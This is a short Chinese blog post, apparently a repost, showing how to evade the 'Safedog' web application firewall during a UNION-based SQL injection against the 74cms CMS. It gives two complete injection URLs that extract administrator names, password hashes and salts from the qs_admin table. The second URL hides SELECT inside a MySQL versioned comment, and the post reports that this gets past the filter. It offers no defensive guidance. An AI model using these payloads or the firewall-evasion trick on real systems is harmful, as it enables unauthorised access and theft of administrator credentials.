绕过安全狗继续union注入 – 网站安全

mysql注入绕过无压力提交http://demo.74cms.com/plus/ajax_common.php?act=hotword&query=錦'union+select+1,group_concat%28admin_name,0x3a,pwd,0x3a,pwd_hash%29,3+from+qs_admin%23 绕过安全狗继续union注入 – 网站安全 – 自学php插图

被拦截了，经过测试拦截的是select，那么把select换成/*!50000SeLect*/呢然后提交 http://demo.74cms.com/plus/ajax_common.php?act=hotword&query=%E9%8C%A6%27union+/*!50000SeLect*/+1,group_concat%28admin_name,0x3a,pwd,0x3a,pwd_hash%29,3+from+qs_admin%23
绕过安全狗继续union注入 – 网站安全 – 自学php插图1

成功绕过！

本博客所有文章如无特别注明均为原创。
复制或转载请以超链接形式注明转自起风了，原文地址《绕过安全狗继续union注入 – 网站安全 – 自学php》